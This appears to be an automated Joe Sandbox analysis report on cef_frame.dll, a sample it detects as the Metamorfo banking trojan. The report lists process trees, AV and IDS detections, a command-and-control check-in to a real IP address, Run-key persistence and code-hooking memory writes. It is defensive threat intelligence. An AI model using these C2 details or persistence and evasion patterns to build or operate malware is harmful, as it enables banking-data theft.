Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cef_frame.dll

Overview

General Information

Sample name:cef_frame.dll
Analysis ID:1592146
MD5:a03c075ec2d02a406712ecbc828ca98e
SHA1:8f2b6a37800de2bc944e3d687bfd73754e550681
SHA256:32530abfeaeaefebdf0715fd098104671d716bb02d609197bef67c7f4b8b0e8d
Tags:bankerdlllatamtrojanuser-johnk3r
Infos:

Detection

Metamorfo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Metamorfo
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Machine Learning detection for sample
Overwrites code with function prologues
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6428 cmdline: loaddll32.exe "C:\Users\user\Desktop\cef_frame.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3768 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 1912 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 504 cmdline: rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 404 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 1804 cmdline: rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TbsAppInstance MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5004 cmdline: rundll32.exe C:\Users\user\Desktop\cef_frame.dll,__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4232 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 5192 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TbsAppInstance MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 5632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1272 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6888 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1436 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 2168 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7064 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",dbkFCallWrapperAddr MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 6808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 5264 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 352 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MetamorfoAccording to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_MetamorfoYara detected MetamorfoJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\SysWOW64\rundll32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T20:38:03.630224+010028331871Malware Command and Control Activity Detected192.168.2.64985215.228.77.17880TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: cef_frame.dllVirustotal: Detection: 29%Perma Link
    Source: cef_frame.dllReversingLabs: Detection: 34%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
    Machine Learning detection for sample
    Source: cef_frame.dllJoe Sandbox ML: detected
    Source: cef_frame.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2833187 - Severity 1 - ETPRO MALWARE Win32/Metamorfo CnC Checkin : 192.168.2.6:49852 -> 15.228.77.178:80
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 15.228.77.178 80Jump to behavior
    Source: global trafficTCP traffic: 192.168.2.6:58179 -> 162.159.36.2:53
    Source: Joe Sandbox ViewIP Address: 15.228.77.178 15.228.77.178
    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
    Source: unknownDNS traffic detected: query: 171.39.242.20.in-addr.arpa replaycode: Name error (3)
    Source: global trafficHTTP traffic detected: POST /ytr/serv.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 145Host: 15.228.77.178Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
    Source: unknownHTTP traffic detected: POST /ytr/serv.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 145Host: 15.228.77.178Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
    Source: rundll32.exe, 00000003.00000002.2431194998.0000000004B51000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.2563309483.000000000851F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2571642187.00000000045F1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2577672561.0000000007E8F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2462605650.000000000844F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2973058518.0000000007F3F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2961091409.00000000045F1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2906768585.000000000851F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2898272562.0000000004BD1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000003.2817042023.000000000825F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2865149640.00000000082CF000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2825340181.0000000004A51000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.indyproject.org/

    System Summary

    barindex
    PE file contains section with special chars
    Source: cef_frame.dllStatic PE information: section name: .E{7
    Source: cef_frame.dllStatic PE information: section name: .< a
    Source: cef_frame.dllStatic PE information: section name: .z}'
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 768
    Source: cef_frame.dllStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: cef_frame.dllStatic PE information: Number of sections : 13 > 10
    Source: cef_frame.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
    Source: classification engineClassification label: mal100.troj.evad.winDLL@28/29@1/1
    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\632922Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7064
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5192
    Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\45585454uhuhuhuhuhuhuhuhu
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess504
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1912
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4232
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\b3fdb59a-f5f4-4629-b8b8-3515d63ae95aJump to behavior
    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationIntercept
    Source: cef_frame.dllVirustotal: Detection: 29%
    Source: cef_frame.dllReversingLabs: Detection: 34%
    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\cef_frame.dll"
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationIntercept
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TbsAppInstance
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,__dbk_fcall_wrapper
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 768
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 776
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TMethodImplementationIntercept
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TbsAppInstance
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",__dbk_fcall_wrapper
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",dbkFCallWrapperAddr
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 768
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1272
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1436
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 768
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationInterceptJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TbsAppInstanceJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,__dbk_fcall_wrapperJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TMethodImplementationInterceptJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TbsAppInstanceJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",__dbk_fcall_wrapperJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",dbkFCallWrapperAddrJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: magnification.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: d3d9.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: security.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: olepro32.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: cef_frame.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: cef_frame.dllStatic file information: File size 22631424 > 1048576
    Source: cef_frame.dllStatic PE information: Raw size of .z}' is bigger than: 0x100000 < 0x1594200
    Source: initial sampleStatic PE information: section where entry point is pointing to: .z}'
    Source: cef_frame.dllStatic PE information: section name: .didata
    Source: cef_frame.dllStatic PE information: section name: .E{7
    Source: cef_frame.dllStatic PE information: section name: .< a
    Source: cef_frame.dllStatic PE information: section name: .z}'

    Boot Survival

    barindex
    Creates an autostart registry key pointing to binary in C:\Windows
    Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rundll32.exeJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rundll32.exeJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rundll32.exeJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Overwrites code with function prologues
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 7734BA30 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 76934D90 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 7694EBF0 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 75928A90 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 75950230 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 7734BA30 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 76934D90 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 7694EBF0 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 75928A90 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 75950230 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7734BA30 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 76934D90 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7694EBF0 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 75928A90 value: 8B FF 55 8B EC Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 75950230 value: 8B FF 55 8B EC Jump to behavior
    Overwrites code with unconditional jumps - possibly settings hooks in foreign process
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: B30005 value: E9 8B 2F 85 76 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 77382F90 value: E9 7A D0 7A 89 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: B40005 value: E9 2B BA 80 76 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 7734BA30 value: E9 DA 45 7F 89 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: B50008 value: E9 8B 8E 84 76 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 77398E90 value: E9 80 71 7B 89 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: D80005 value: E9 8B 4D BB 75 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 76934D90 value: E9 7A B2 44 8A Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: D90005 value: E9 EB EB BB 75 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 7694EBF0 value: E9 1A 14 44 8A Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: DA0005 value: E9 8B 8A B8 74 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 75928A90 value: E9 7A 75 47 8B Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: DB0005 value: E9 2B 02 BA 74 Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 6428 base: 75950230 value: E9 DA FD 45 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 3380005 value: E9 8B 2F 00 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 77382F90 value: E9 7A D0 FF 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 3390005 value: E9 2B BA FB 73 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 7734BA30 value: E9 DA 45 04 8C Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 8320008 value: E9 8B 8E 07 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 77398E90 value: E9 80 71 F8 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 8340005 value: E9 8B 4D 5F 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 76934D90 value: E9 7A B2 A0 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 8350005 value: E9 EB EB 5F 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 7694EBF0 value: E9 1A 14 A0 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 8360005 value: E9 8B 8A 5C 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 75928A90 value: E9 7A 75 A3 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 8370005 value: E9 2B 02 5E 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 504 base: 75950230 value: E9 DA FD A1 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: A90005 value: E9 8B 2F 8F 76 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: 77382F90 value: E9 7A D0 70 89 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: AA0005 value: E9 2B BA 8A 76 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: 7734BA30 value: E9 DA 45 75 89 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: AB0008 value: E9 8B 8E 8E 76 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: 77398E90 value: E9 80 71 71 89 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: BD0005 value: E9 8B 4D D6 75 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: 76934D90 value: E9 7A B2 29 8A Jump to behavior
